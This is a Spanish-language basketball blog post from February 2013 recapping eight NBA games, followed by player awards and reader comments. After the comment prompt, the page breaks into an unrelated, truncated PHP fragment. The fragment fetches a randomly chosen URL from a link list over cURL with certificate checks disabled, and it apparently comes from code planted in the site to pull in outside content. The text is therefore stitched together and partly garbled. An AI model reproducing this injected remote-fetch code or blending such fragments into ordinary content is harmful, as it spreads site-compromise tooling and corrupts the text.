La Crónica: Los Pacers son el rival en el Este

27 de February de 2013 por Viva_Dirk

La noche de ayer nos dejaba 8 partidos, sin grandes duelos a priori salvo el Warriors-Pacers, dos de los equipos más de moda de la liga. El partido, que estuvo marcado por una gran pelea que acabó con la expulsión de Hibbert, se lo llevaron los de Indiana gracias a un mejor control del balón, una mayor anotación en la pintura y sobre todo a una gran actuación de casi todos sus titulares (97-108). Por los Warriors un espectacular Stephen Curry no fue suficiente debido a los días grises de David Lee, Jarrett Jack y Klay Thompson. A destacar el 57% en triples de Golden State, por solo un 38% en tiros de 2. Ahora mismo, Indiana parece el equipo más sólido del Este, exceptuando a los actuales campeones.

En Miami los campeones sudaron sangre para ganar a unos sorprendentes Kings después de 2 prórrogas. Lebron y Wade estuvieron bestiales y Ray Allen a gran nivel. Entre los 3 sumaron nada menos que 100 puntos pero delante tuvieron a otro trío que sumó 86. Al final el físico jugó a favor de los Heat ya que los Kings plantearon el encuentro con una rotación mucho más reducida. Los 141 puntos de los Heat igualan el récord de la franquicia (129-141).

Los Sixers siguen en una verdadera crisis y ayer fueron los Magic los que se llevaron la victoria de Philadephia. Brillaron todos los jugadores de los Magic, cada uno en su papel, con Tobias Harris ejerciendo más que correctamente de 6º hombre. Los locales acabaron con menos de un 40% de acierto en tiros y el quinteto titular sumó 33 puntos. Ahora mismo parecen un equipo desquiciado (98-84).  

Los Cavs se llevaron la victoria de Chicago a pesar de no contar con Irving en un choque igualadísimo. El juego ultracolectivo de los Bulls les llevó a repartir 33 asistencias y anotar con buenos porcentajes mientras que los Cavaliers se agarraron a un gran partido de Waiters y a su superioridad física para finalmente imponerse (101-98).

Otra victoria visitante la consiguieron los Nets en New Orleans. Un gran Deron y un partidazo de Brook Lopez fueron necesarios para tumbar a unos Hornets que robaron más balones de los que perdieron, liderados como casi siempre por Greivis Vasquez (101-97).

En Dallas los Bucks se llevaron la victoria en el último cuarto. A pesar de coger casi 20 rebotes mas que su rival, los Mavs pagaron el demencial 1 de 17 en triples y las 20 pérdidas de balón. De esas 20 pérdidas fueron 6 los robos de Monta Ellis que fue el mejor de los suyos (95-90).

Partido feo el que se llevaron los Suns ante los Wolves (83-84). A pesar de jugar una prórroga el partido no llegó a los 85 puntos, con bajísimos porcentajes de tiro por ambos lados, un 5 de 14 en tiros libres de los Suns y un número considerable de pérdidas de balón. Eso sí, hay que estar atentos a Derrick Williams que parece haber despertado. Ayer 21 puntos y 12 rebotes.

Para acabar, no tuvieron problema los Clippers para ganar en casa a los Bobcats por 22 puntos (84-106). Uno de esos partidos en los que Chris Paul hace felices a todos sus compañeros de tal manera que la pareja Griffin&Jordan acaba con un 17 de 20 en tiros y aleros como Butler y Barnes suman un 7 de 12 en triples. Por los Bobcats el mejor Gerald Henderson con un partido para olvidar de MKG al que el rookie wall le ha afectado sobre manera.

PREMIOS

MVP: “Números de videjuego” según Erik Spolestra. Lebron James se fue a los 40 puntos, 8 rebotes y 16 asistencias y Dwyane Wade a los 39 puntos, 8 rebotes y 7 asistencias en la victoria de los Heat frente los Kings. En la 2ª prórroga Lebron anotó 11 puntos sin fallo…

Rookie: Dion Waiters lideró a los Cavaliers a la victoria con 25 puntos mientras que Andrew Nicholson anotó 13 puntos en apenas 17 minutos.

Sorpresa: Los 36 puntos de Marcus Thorton son el máximo registro anotado por un suplente esta temporada. A Tobias Harris el traspaso a los Magic le ha sentado mejor que bien. Ayer fue de lo mejor del equipo con 16 puntos y 7 rebotes.

Decepción: Tras sus exhibiciones en los últimos dos partidos, batacazo de Jarrett Jack. El de los Warriors falló 8 de sus 10 lanzamientos a canasta y perdió 5 balones. Vince Carter falló los 8 tiros que intentó y se quedó en 2 puntos.

Esfuerzo en vano: Esta vez Stephen Curry se quedó solo ante el peligro y solo es muy difícil ganar. Sus 38 puntos no fueron suficientes para imponerse a los Pacers. Los 36 de Marcus Thorton tampoco pero es que él se enfrentaba a Lebron&Wade.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Nacho dice:
    #1

    Números de videojuego? James en 48 minutos sólo pudo bajar 8 rebotes!!! Al final no va a ser tan bueno!!! xD

      Citar

  2. Albertis dice:
    #2

    Vaya pareja esta de los Heat, cada vez me recuerdan más a la mejor que yo he visto, que no es otra que Michael-Pip; están ejerciendo un dominio en el juego parecido al de aquellos, no creo que lleguen a coleccionar tantos anillos pero quizá se acerquen!

      Citar

  3. Esteban dice:
    #3

    que desperdicio un talento ofensivo como marcus thorton jugando en los Kings

      Citar

  4. Denise dice:
    #4

    Bueno..Tobias Harris (al cual solo conocía de box-scores) 15 puntos, 7 rebotes, 2 tapones y 63% en tiros de campo en sus 2 partidos como Magic. Es dificil que mantenga esos numeros, pero tiene buena pinta su adquisición.

      Citar

  5. Txusma dice:
    #5

    Denise:
    Bueno..Tobias Harris (al cual solo conocía de box-scores) 15 puntos, 7 rebotes, 2 tapones y 63% en tiros de campo en sus 2 partidos como Magic. Es dificil que mantenga esos numeros, pero tiene buena pinta su adquisición.

    Yo creo q es una muy buena adquisición. De hecho creo q era Hollinger el que decia q a largo plazo era el 2o mejor jugador del draft por detrás de Irving. Estå jugando más bien de 4, no? A ver como reparten el tiempo entre él, harkless y Nicholson

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>